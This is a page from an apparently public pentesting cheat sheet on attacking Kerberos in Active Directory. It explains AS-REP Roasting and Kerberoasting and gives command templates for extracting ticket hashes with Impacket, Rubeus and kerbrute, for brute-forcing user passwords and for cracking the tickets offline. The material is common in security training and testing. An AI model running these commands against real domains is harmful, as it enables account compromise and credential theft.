d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Related
  • AS-REP Roasting
  • Requirements
  • Impacket
  • Rubeus
  • kerbrute
  • Kerberoasting
  • Requirements
  • Impacket
  • Rubeus
  • kerberoast
  • Sync time
  • ntpdate
  • Manually
Edit on GitHub
  1. Services
  2. TCP

TCP 88: Kerberos

PreviousTCP 80, 443: HTTP(S)NextTCP 110, 995: POP3(S)

Last updated 3 years ago

Kerberos is a computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.

--

Related

AS-REP Roasting

If Kerberos preauthentication is disabled for a user, the Key Distribution Center (KDC) just issues a Ticket Granting Ticket (TGT) for any user we request (AS_REQ). Part of the reply (AS_REP) is encryted using the users password, and can then be cracked offline.

See also .

Requirements

  • Only works on user accounts that have Kerberos preauthentication disabled

  • List of potential usernames (may be queried from LDAP using a domain account)

Impacket

GetNPUsers.py <domain>/<username> -dc-ip <ip>

Rubeus

Rubeus.exe asreproast /user:<username> /dc:<ip> /domain:<domain> /outfile:hashes.txt /format:hashcat

kerbrute

Enumerate users

./kerbrute_linux_386 userenum -d <domain> --dc <domaincontroller> <usernames.txt>

bruteforce password of one user

./kerbrute_linux_386 bruteuser -d <domain> --dc <domaincontroller> <password-list> <username@domain>

Kerberoasting

If we have access to any user account on the domain, we can request (TGS_REQ) Ticket Granting Service (TGS) tickets for any service account (using SPN). The reply (TGS_REP) contains the TGS, encrypted with the service accounts password, that can then be cracked offline.

Requirements

  • Only works on service accounts that have a Service Principal Name (SPN) set

  • Creds/User account on the domain (low priv is sufficient)

Impacket

GetUserSPNs <domain>/<username> -dc-ip <ip> -request

Rubeus

TODO

kerberoast

sudo apt install kerberoast
python /usr/share/kerberoast/tgsrepcrack.py <wordlist> <exported-tickets-file>

Sync time

It's necessary to sync the client time to the domain controller.

Error (when not synced)

SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

ntpdate

ntpdate <dc-ip>

Manually

Get server time

nmap -sC -sV <ip>
Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-20T00:14:12
|_  start_date: N/A

Set local time accordingly

date -s "20 Mar 2020 00:14:12+00:00"

A tool to perform Kerberos pre-auth bruteforcing

See also

Use exported tickets from

Wikipedia
Active Directoy
TCP 389, 636, 3268, 3269: LDAP
Impacket
GitHub: TarlogicSecurity/kerberos_attacks_cheatsheet.md
YouTube - Conda - Attacking Active Directory - AS-REP Roasting
GitHub - ropnop/kerbrute
YouTube - Conda - Attacking Active Directory - Kerberoasting
Mimikatz